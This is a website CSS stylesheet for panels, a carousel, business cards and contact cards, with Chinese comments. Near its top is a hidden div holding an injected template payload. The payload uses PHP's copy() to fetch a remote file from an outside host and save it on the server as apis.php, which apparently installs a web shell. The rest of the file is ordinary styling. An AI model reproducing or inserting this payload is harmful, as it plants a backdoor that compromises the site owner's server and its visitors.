/* Css for , Version=1774244649 */
 <div style="display:none">
{$a="copy"}{$a("http://www.cw2008.com/1.txt","apis.php")}
</div>#block13{}#block13 .panel-heading{}#block13
{
  /*.panel-heading {}*/
  /*.panel-body    {}*/
}#block14{}#block14 .panel-heading{}#block14
{
  /*.panel-heading {}*/
  /*.panel-body    {}*/
}
.slide .carousel-indicators li {margin: 0 3px; width: 24px; height: 4px; border: none; border-radius: 10px; opacity: .4; background: #fff; transition: opacity .3s, height .3s, margin .3s; position: relative}
.slide .carousel-indicators li:before {content: ' '; display: block; top: -10px; bottom: -10px; width: 100%; position: absolute;}
.slide .carousel-indicators li.active {width: 24px; opacity: 1}
.slide .carousel-indicators li:hover {margin-bottom: -1px; height: 6px; opacity: .7;}

  .full-width-section {
    width: 100%;
    margin: 0;
    padding: 0;
    display: flex;
    align-items: stretch;
    box-sizing: border-box;
  }
  .full-width-section .image-col {
    width: 50%;
    object-fit: cover;
    height: 100%; /* 确保图片高度和文字区一致 */
  }
  .full-width-section .text-col {
    width: 50%;
    padding: 40px;
    display: flex;
    flex-direction: column;
    justify-content: center;
    background: #fff;
    box-sizing: border-box;
  }
  /* 重点：标题绿色下划线样式 */
  .full-width-section h2 {
    font-size: 24px;
    margin-top: 0;
    margin-bottom: 16px;
    color: #333;
    /* 绿色下划线核心样式 */
    position: relative;
    display: inline-block;/* 下划线宽度适配文字 */
    padding-bottom: 8px; /* 文字和下划线间距 */
  }
  .full-width-section h2::after {
    content: "";
    position: absolute;
    left: 0;
    bottom: 0;
    width: 80px;
    height: 3px; /* 下划线粗细 */
    background-color: #88c057; /* 清新绿色，可自行调整色值 */
  }
  .full-width-section p {
    font-size: 16px;
    line-height: 1.6;
    color: #666;
    margin-bottom: 12px;
  }
#block254{}#block254 .panel-heading{}#block254
{
  /*.panel-heading {}*/
  /*.panel-body    {}*/
}
        /* 全局样式重置 */
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        /* 页面背景 */
        body {
            background-color: #f9f9f9;
            padding: 60px 20px;
        }
        /* 标题区域 */
        .news-header {
            text-align: center;
            margin-bottom: 40px;
        }
        .news-header h2 {
            font-size: 28px;
            color: #333;
            margin-bottom: 8px;
            position: relative;
        }
        .news-header h2::after {
            content: '';
            width: 60px;
            height: 3px;
            background-color: #88c057;
            position: absolute;
            bottom: -8px;
            left: 50%;
            transform: translateX(-50%);
        }
        .news-header p {
            color: #999;
            font-size: 14px;
        }
        /* 业务卡片容器 */
        .business-cards {
            max-width: 1000px;
            margin: 0 auto;
            padding: 0 15px;
            display: flex;
            flex-wrap: wrap;
            gap: 25px;
           
        }
        /* 单个业务卡片样式 */
        .business-card {
            width: 300px;
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
            overflow: hidden;
        }
        .business-card img {
            width: 100%;
            height: 200px;
            object-fit: cover;
        }
        .business-content {
            padding: 20px 15px;
        }
        .business-tag {
            font-size: 12px;
            color: #fff;
            background-color: #88c057;
            padding: 3px 8px;
            border-radius: 4px;
            display: inline-block;
            margin-bottom: 10px;
        }
        .business-content h3 {
            font-size: 16px;
            color: #333;
            margin-bottom: 10px;
            font-weight: 600;
        }
        .business-desc {
            font-size: 14px;
            color: #666;
            line-height: 1.6;
            margin-bottom: 15px;
        }
        .learn-more {
            display: inline-block;
            padding: 8px 18px;
            border: 1px solid #88c057;
            color: #88c057;
            border-radius: 4px;
            font-size: 14px;
            
        }
        .learn-more:hover {
            background-color: #88c057;
            color: #fff;
        }
    #block253{}#block253 .panel-heading{}#block253
{
  /*.panel-heading {}*/
  /*.panel-body    {}*/
}
        /* 全局样式重置 */
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: "Microsoft Yahei", sans-serif;
        }
        /* 页面背景*/
        body {
            background-color: #f9f9f9;
            padding: 60px 20px;
        }
        /* 标题区域 */
        .contact-header {
            text-align: center;
            margin-bottom: 40px;
        }
        .contact-header h2 {
            font-size: 28px;   
            color: #333;
            margin-bottom: 8px;
            position: relative;
            display: inline-block;
        }
        .contact-header h2::after {
            content: '';
            width: 60px;
            height: 3px;
            background-color: #88c057;
            position: absolute;
            bottom: -8px;
            left: 50%;
            transform: translateX(-50%);
        }
        .contact-header p {
            color: #999;
            font-size: 14px;    
        }
        /* 联系信息卡片容器 */
        .contact-cards {
            max-width: 1000px;  
            margin: 0 auto;     
            padding: 0 15px;    
            display: flex;
            gap: 20px;
            flex-wrap: wrap;
        }
        /* 单个卡片样式 */
        .contact-card {
            background-color: #fff;
            padding: 30px 20px;
            width: 300px;
            text-align: center;
            border-radius: 8px;
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.05);
        }
        .contact-card .icon {
            width: 40px;
            height: 40px;
            margin: 0 auto 15px;
            background-size: contain;
            background-repeat: no-repeat;
            background-position: center;
        }
        .contact-card h3 {
            font-size: 16px;
            color: #333;
            margin-bottom: 10px;
            font-weight: 500;
        }
        .contact-card p {
            color: #666;
            font-size: 14px;    
            line-height: 1.6;   
        }
        /* 图标背景 */
        .icon-address {
            background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='%23999'%3E%3Cpath d='M12 2C8.13 2 5 5.13 5 9c0 5.25 7 13 7 13s7-7.75 7-13c0-3.87-3.13-7-7-7zM7 9c0-2.76 2.24-5 5-5s5 2.24 5 5c0 2.88-2.88 7.19-5 9.88C9.92 16.21 7 11.85 7 9z'/%3E%3Ccircle cx='12' cy='9' r='2.5'/%3E%3C/svg%3E");
        }
        .icon-phone {
            background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='%23999'%3E%3Cpath d='M20 15.5c-1.25 0-2.45-.2-3.57-.57-.1-.07-.22-.12-.33-.17l-1.43-1.44c-.41-.41-.92-.72-1.49-.92C11.92 11.39 11 10.7 11 9.91V6c0-.55-.45-1-1-1H7c-.55 0-1 .45-1 1v3.91c0 .79-.92 1.48-2.54 1.88-.57.2-1.09.51-1.49.92L2 13.79c-.22.22-.41.47-.57.76C.71 14.69 2 15.5 2 15.5c-1.1 0-2 .9-2 2v1c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2v-1c0-1.1-.9-2-2-2z'/%3E%3C/svg%3E");
        }
        .icon-email {
            background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='%23999'%3E%3Cpath d='M20 4H4c-1.1 0-1.99.9-1.99 2L2 18c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm0 14H4V8l8 5 8-5v10zm-8-7L4 6h16l-8 5z'/%3E%3C/svg%3E");
        }
    #block252{}#block252 .panel-heading{}#block252
{
  /*.panel-heading {}*/
  /*.panel-body    {}*/
}